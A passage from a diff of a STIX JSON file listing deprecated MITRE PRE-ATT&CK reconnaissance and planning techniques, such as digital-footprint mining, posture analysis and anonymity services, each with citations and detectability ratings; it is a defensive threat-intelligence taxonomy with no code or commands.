domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1275).\n\nIn addition to a target's social media presence may exist a larger digital footprint, such as accounts and credentials on e-commerce sites or usernames and logins for email. An adversary familiar with a target's username can mine to determine the target's larger digital footprint via publicly available sources. (Citation: DigitalFootprint) (Citation: trendmicro-vtech)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1275", + "external_id": "T1275" + }, + { + "source_name": "DigitalFootprint", + "description": "Christopher Budd. (2016, June 27). The importance of understanding your digital footprint. Retrieved May 4, 2017." + }, + { + "source_name": "trendmicro-vtech", + "description": "Christopher Budd. (2015, December 1). Understanding the Risks of the VTech Data Breach. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Information readily available through searches", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1052", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze application security posture", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1293).\n\nAn adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: Li2014ExploitKits) (Citation: RecurlyGHOST)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1293", + "external_id": "T1293" + }, + { + "source_name": "Li2014ExploitKits", + "description": "Brooks Li. (2014, December 17). What\u2019s New in Exploit Kits in 2014. Retrieved March 6, 2017." + }, + { + "source_name": "RecurlyGHOST", + "description": "Mark Poole. (2015, January 27). GHOST vulnerability (CVE-2015-0235) in popular Linux library glibc allows remote code execution. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyze technical scanning results to identify weaknesses in the configuration or architecture. Many of the common tools highlight these weakness automatically (e.g., software security scanning tools or published vulnerabilities about commonly used libraries).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1070", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--87775365-2081-4b6e-99bd-48a3b8f36563", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze architecture and configuration posture", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1288).\n\nAn adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1288", + "external_id": "T1288" + }, + { + "source_name": "FireEyeAPT28", + "description": "FireEye, Inc. (2014). APT 28: A Window into Russia\u2019s Cyber Espionage Operations?. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Many of the common tools highlight these weakness automatically.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1065", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze business processes", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1301).\n\nBusiness processes, such as who typically communicates with who, or what the supply chain is for a particular part, provide opportunities for social engineering or other (Citation: Warwick2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1301", + "external_id": "T1301" + }, + { + "source_name": "Warwick2015", + "description": "Warwick Ashford. (2015, March). Cyber crime: What every business needs to know. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Social engineering and other attempts to learn about business practices and processes would not immediately be associated with an impending cyber event.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "To get any kind of fidelity into business processes would require insider access. Basic processes could be mapped, but understanding where in the organization these processes take place and who to target during any given phase of the process would generally be difficult.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1078", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--773950e1-090c-488b-a480-9ff236312e31", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze data collected", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1287).\n\nAn adversary will assess collected information such as software/hardware versions, vulnerabilities, patch level, etc. They will analyze technical scanning results to identify weaknesses in the confirmation or architecture. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper) (Citation: RSA-APTRecon) (Citation: FireEyeAPT28)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1287", + "external_id": "T1287" + }, + { + "source_name": "SurveyDetectionStrategies", + "description": "Jamal Raiyn. (2014). A survey of Cyber Attack Detection Strategies. Retrieved March 5, 2017." + }, + { + "source_name": "CyberReconPaper", + "description": "H. P. Sanghvi and M. S. Dahiya. (2013, February). Cyber Reconnaissance: An Alarm before Cyber Attack. Retrieved March 5, 2017." + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "FireEyeAPT28", + "description": "FireEye, Inc. (2014). APT 28: A Window into Russia\u2019s Cyber Espionage Operations?. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Many of the common tools highlight these weaknesses automatically. Adversary can \"dry run\" against the target using known exploits or burner devices to determine key identifiers of software, hardware, and services.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1064", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a1e8d61b-22e1-4983-8485-96420152ecd8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze hardware/software security defensive capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1294).\n\nAn adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1294", + "external_id": "T1294" + }, + { + "source_name": "OSFingerprinting2014", + "description": "InfoSec Institute. (2014, June 19). What You Must Know About OS Fingerprinting. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyze network traffic to determine security filtering policies, packets dropped, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1071", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze organizational skillsets and deficiencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1300).\n\nAnalyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1300", + "external_id": "T1300" + }, + { + "source_name": "FakeLinkedIn", + "description": "LIFARS. (2015, October 8). Hackers Fake LinkedIn Profiles to Scout Targets. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1077", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze organizational skillsets and deficiencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1289).\n\nAnalyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1289", + "external_id": "T1289" + }, + { + "source_name": "FakeLinkedIn", + "description": "LIFARS. (2015, October 8). Hackers Fake LinkedIn Profiles to Scout Targets. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Job postings and hiring requisitions have to be made public for contractors and many times have the name of the organization being supported. In addition, they outline the skills needed to do a particular job, which can provide insight into the technical structure and organization of a target.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1066", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze organizational skillsets and deficiencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1297).\n\nUnderstanding organizational skillsets and deficiencies could provide insight in to weakness in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1297", + "external_id": "T1297" + }, + { + "source_name": "FakeLinkedIn", + "description": "LIFARS. (2015, October 8). Hackers Fake LinkedIn Profiles to Scout Targets. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No access to who is consuming the job postings to know what is being observed.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Job postings have to be made public for contractors and many times have the name of the organization being supported.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1074", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze presence of outsourced capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1303).\n\nOutsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1303", + "external_id": "T1303" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "OPM Breach", + "description": "Hon. Jason Chaffetz, Hon. Mark Meadows, Hon. Will Hurd. (2016, September 7). The OPM Data Breach: How the Government Jeopardized Our National Security for More than a Generation. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Much of this analysis can be done using the target's open source website, which is purposely designed to be informational and may not have extensive visitor tracking capabilities.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyzing business relationships from information gathering may provide insight into outsourced capabilities. In certain industries, outsourced capabilities or close business partnerships may be advertised on corporate websites.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1080", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze social and business relationships, interests, and affiliations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1295).\n\nSocial media provides insight into the target's affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1295", + "external_id": "T1295" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public sources are external to the defender's organization. Some social media sites have an option to show you when users are looking at your profile, but an adversary can evade this tracking depending on how they conduct the searches.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Social and business relationship information for an individual can be found by examining their social media contacts (e.g., [https://www.facebook.com Facebook] and [https://www.linkedin.com LinkedIn]). Social media also provides insight into the target's affiliations with groups and organizations. Finally, certification information can explain their technical associations and professional associations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1072", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d3dca536-8bf0-4e43-97c1-44a2353c3d69", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Anonymity services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1306).\n\nAnonymity services reduce the amount of information available that can be used to track an adversary's activities. Multiple options are available to hide activity, limit tracking, and increase anonymity. (Citation: TOR Design) (Citation: Stratfor2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1306", + "external_id": "T1306" + }, + { + "source_name": "TOR Design", + "description": "Roger Dingledine, Nick Mathewson, Paul Syverson. (2004, August). Tor: The Second-Generation Onion Router. Retrieved March 28, 2017." + }, + { + "source_name": "Stratfor2012", + "description": "Sean Gallagher. (2012, March 6). Inside the hacking of Stratfor: the FBI\u2019s case against Antisec member Anarchaos. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Depends on service. Some are easy to detect, but are hard to trace (e.g., [https://torproject.org TOR]).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy access to anonymizers, quasi-anonymous services like remailers, [https://torproject.org TOR], relays, burner phones, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1083", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ae85ba2f-27ea-42d9-b42a-0fe89ee19ed5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess KITs/KIQs benefits", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1229).\n\nKey Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) may be further subdivided to focus on political, economic, diplomatic, military, financial, or intellectual property categories. An adversary may specify KITs or KIQs in this manner in order to understand how the information they are pursuing can have multiple uses and to consider all aspects of the types of information they need to target for a particular purpose. (Citation: CompetitiveIntelligence) (Citation: CompetitiveIntelligence)KIT.", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1229", + "external_id": "T1229" + }, + { + "source_name": "CompetitiveIntelligence", + "description": "Matt H. Evans. (n.d.). Course 12: Competitive Intelligence (Part 2 of 2). Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1006", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--8e927b19-04a6-4aaa-a42f-4f0a53411d27", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess current holdings, needs, and wants", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1236).\n\nAnalysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1236", + "external_id": "T1236" + }, + { + "source_name": "CyberAdvertisingChar", + "description": "Tom Parker, Matt Devost, Marcus Sachs, and Toby Miller. (2003). Cyber Adversary Characterization. Retrieved March 5, 2017." + }, + { + "source_name": "CIATradecraft", + "description": "Central Intelligence Agency. (2009). A Tradecraft Primer: Structured Analytic Techniques for Improving Intelligence Analysis. Retrieved March 5, 2017." + }, + { + "source_name": "ForensicAdversaryModeling", + "description": "John Lowry, Rico Valdez, Brad Wood. (n.d.). Adversary Modeling to Develop Forensic Observables. Retrieved March 5, 2017." + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1013", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d3999268-740f-467e-a075-c82e2d04be62", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess leadership areas of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1224).\n\nLeadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1224", + "external_id": "T1224" + }, + { + "source_name": "ODNIIntegration", + "description": "Office of the Director of National Intelligence. (n.d.). Intelligence Integration - Who Are We. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1001", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e2aa077d-60c9-4de5-b015-a9c382877cd9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess opportunities created by business deals", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1299).\n\nDuring mergers, divestitures, or other period of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests, or other non standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1299", + "external_id": "T1299" + }, + { + "source_name": "RossiMergers", + "description": "Ben Rossi. (2014, August 29). Mergers and acquisitions: a new target for cyber attack. Retrieved March 6, 2017." + }, + { + "source_name": "MeidlHealthMergers", + "description": "Holly Meidl. (2015, December 16). How Health Care Companies Can Reduce the Risk of Cyber-Attack During Mergers and Acquisitions. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Most of this activity would target partners and business processes. Partners would not report. Difficult to tie this activity to a cyber attack.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Mapping joint infrastructure and business processes is difficult without insider knowledge or SIGINT capability. While a merger creates and opportunity to exploit potentially cumbersome or sloppy business processes, advance notice of a merger is difficult; merger information is typically close-hold until the deal is done.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1076", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess security posture of physical locations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1302).\n\nPhysical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1302", + "external_id": "T1302" + }, + { + "source_name": "CyberPhysicalAssessment", + "description": "Doug MacDonald, Samuel L Clements, Scott W Patrick, Casey Perkins, George Muller, Mary J Lancaster, Will Hutton. (2013, February). Cyber/physical security vulnerability assessment integration. 